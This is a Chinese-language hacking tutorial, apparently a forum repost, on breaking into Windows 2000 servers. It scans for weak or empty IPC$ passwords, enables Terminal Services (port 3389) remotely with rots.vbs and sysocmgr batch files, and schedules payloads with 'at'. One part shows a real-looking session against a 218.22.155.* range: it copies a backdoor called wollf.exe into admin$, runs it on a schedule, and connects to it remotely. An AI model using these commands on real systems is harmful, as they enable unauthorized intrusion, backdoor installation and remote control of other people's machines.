使用的工具:
1:ipcscan掃描器
2:終端服務連接工具xpts.exe(WIN 2000/XP 終端連接程序. 內附有COPY 文件的補丁. 格式 IP:Port )
3:開終端的腳本rots.vbs(灰色軌跡zzzevazzz的作品)
4:cscript (在system32文件夾下;98操作系統可能沒有
二:步驟:
1:用ipcscan掃描弱口令(妳們可以自己掃,我也掃到壹些弱口令主機.演實時間我在論壇上再發)
2:用rots.vbs開啟終端服務
說明 cscript ROTS.vbs <目標IP> <用戶名> <密碼> [服務端口] [自動重起選項]
格式 cscript.exe rots.vbs ip user userpass port /r
或者 cscript.exe rots.vbs ip user userpass port /fr
三:常見問題:
1:腳本會判斷目標系統類型,如果不是server及以上版本,就會提示妳是否要取消。因為pro版不能安裝終端服務.如果妳確信腳本判斷錯誤,就繼續安裝好了.
2:可能會出現:Conneting 202.202.202.202 ....Error0x80070776 .Error description: 沒有發現指定的此對象導出者,這個還是放棄吧.
3:可能會連接不上,請用這個格式127.0.0.1:1818 1818是剛才開的端口.第二種方法:
進入後:TELNET上去!
c:\>echo [Components] > c:\rock
c:\>echo TSEnable = on >> c:\rock
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q
或者!
c:\>echo [Components] > d:\wawa
c:\>echo TSEnable = on >> d:\wawa
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:d:\wawa /q
等會自動啟後就OK
或者:
在本地利用dos命令edit建立.bat後綴批處理文件(文件名隨意) echo [Components] > c:\sql
echo TSEnable = on >>
c:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
net use \\ip地址\ipc$ 密碼 /user:用戶名(壹般默認:administrator)
利用at time 獲取對方服務器時間。
copy 路徑:\xxx.bat \\ip地址\$c:\winnt
at time 00:00:00 xxx.bat
服務器執行命令後,服務器將重新啟動,利用3389登陸就OK了!第三種方法:
進入後,再次檢查終端組件是否安裝:
c:\>query user
這個工具需要安裝終端服務.
這樣就進壹步確定了組件沒有被安裝.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 運行中 . 2002-1-12 22:5
\\類似這樣的信息,可能組件就已安裝.
好!都清楚了,可以開始安裝了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //檢查INF文件的位置
c:\WINNT\inf 的目錄
2000-01-10 20:00 3,770 sysoc.inf
1 個文件 3,770 字節
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //檢查組件安裝程序
c:\WINNT\system32 的目錄
2000-01-10 20:00 42,768 sysocmgr.exe
1 個文件 42,768 字節
-----------------------------------------------------
c:\>echo [Components] > c:\rock
c:\>echo TSEnable = on >> c:\rock
//這是建立無人參與的安裝參數
c:\>type c:\rock
[Components]
TSEnable = on
//檢查參數文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q
-----------------------------------------------------
這壹條就是真正安裝組件的命令.
以上這條命令沒有加/R參數,主機在安裝完後自動重起.
如若加了/R參數主機就不會重起.
如果壹切正常的話,幾分鐘後對方主機將會離線,當它重新回來時,
3389終端服務就已經開啟.妳就可以連上去了.
問題和建議:
A 在安裝過程中,不使用/R,有時主機也不會重起,妳就要手動重起他,但在使用諸如:iisreset /reboot命令時,對方
的屏幕會出現個對話框,寫著誰引起的這次啟動,離重起還有多少秒.
B 壹次不行可以再試壹次,在實際中很有作用.
C 在輸入sysocmgr命令開始安裝時,壹定不要把命令參數輸錯,那會在對方出現壹個大的對話框,是sysocmgr的幫助,很是顯眼,
而且要求確定.在妳的屏幕上是不會有任何反應的,妳不會知道出錯,所以會有B的建議. 第四種方法:
C:\Documents and Settings\shanlu.XZGJDOMAIN>net use \\218.22.155.*\ipc$ "" /us
er:administrator----------------連接成功!
命令成功完成。
C:\Documents and Settings\shanlu.XZGJDOMAIN>copy wollf.exe \\218.22.155.*\admi
n$------------------------------拷貝wollf.exe到目標計算機的admin$目錄
已復制 1 個文件。
C:\Documents and Settings\shanlu.XZGJDOMAIN>copy hbulot.exe \\218.22.155.*\adm
in$-----------------------------拷貝hbulot.exe到目標計算機的admin$目錄
已復制 1 個文件。
C:\Documents and Settings\shanlu.XZGJDOMAIN>net time \\218.22.155.*
\\218.22.155.* 的當前時間是 2002/12/1 上午 06:37
命令成功完成。
C:\Documents and Settings\shanlu.XZGJDOMAIN>at \\218.22.155.* 06:39 wollf.exe
新加了壹項作業,其作業 ID = 1--指定wollf.exe在06:39運行
------------------------------------------------------------------------------------------
說明:
wollf.exe是壹個後門程序,很多高手都喜歡nc或者winshell,不過我對他情有獨鐘!在這裏我只介紹與本文內
容有關的命令參數,它的高級用法不做補充。
hbulot.exe是用於開啟3389服務,如果不是server及以上版本,就不要運行了。因為pro版不能安裝終端服務。
2分鐘後......
------------------------------------------------------------------------------------------
C:\Documents and Settings\shanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614
"Wollf Remote Manager" v1.6
Code by wollf, ) 原文出處: /Article/Text2/dos/200807/10761.html